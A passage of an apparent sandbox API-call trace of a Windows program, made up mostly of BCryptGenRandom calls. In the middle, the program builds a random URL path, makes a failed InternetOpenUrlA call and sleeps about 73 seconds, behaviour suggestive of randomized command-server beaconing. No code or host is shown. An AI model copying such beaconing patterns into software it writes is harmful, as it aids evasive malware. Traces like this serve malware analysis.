returned 0x0 [0180.952] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0180.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b73a, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a1b73a) returned 0x0 [0180.953] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.953] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.954] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.954] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.955] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.955] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0180.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.956] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.956] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.957] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0180.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.987] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.988] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.988] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.989] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.990] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.991] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0180.992] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.992] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0180.992] GetProcessHeap () returned 0x440000 [0180.992] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0180.992] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0180.992] lstrcatA (in: lpString1="\x04", lpString2="/e9pdyltp4Wg0kzsokbdWjxfe/e6JxpynK3i0hlcgig2Mj4hdj3alib8Fcxjxmnhw0ft5X/" | out: lpString1="\x04/e9pdyltp4Wg0kzsokbdWjxfe/e6JxpynK3i0hlcgig2Mj4hdj3alib8Fcxjxmnhw0ft5X/") returned="\x04/e9pdyltp4Wg0kzsokbdWjxfe/e6JxpynK3i0hlcgig2Mj4hdj3alib8Fcxjxmnhw0ft5X/" [0180.992] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0180.992] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/e9pdyltp4Wg0kzsokbdWjxfe/e6JxpynK3i0hlcgig2Mj4hdj3alib8Fcxjxmnhw0ft5X/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0180.993] GetProcessHeap () returned 0x440000 [0180.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0180.993] GetProcessHeap () returned 0x440000 [0180.993] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b720 | out: hHeap=0x440000) returned 1 [0180.993] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0180.994] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0180.994] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0180.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0180.995] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0180.995] Sleep (dwMilliseconds=0x11f41) [0181.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0181.209] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.209] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0181.209] GetProcessHeap () returned 0x440000 [0181.209] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02850 [0181.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0181.210] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.210] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02851, cbBuffer=0x18, dwFlags=0x2 | out: pbBuffer=0x3a02851) returned 0x0 [0181.211] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0181.515] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.516] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0181.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02869, cbBuffer=0x1d, dwFlags=0x2 | out: pbBuffer=0x3a02869) returned 0x0 [0181.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.524] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.525] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.525] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0181.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.526] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.526] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0181.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0181.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02886, cbBuffer=0x27, dwFlags=0x2 | out: pbBuffer=0x3a02886) returned 0x0 [0181.527] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0181.527] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, 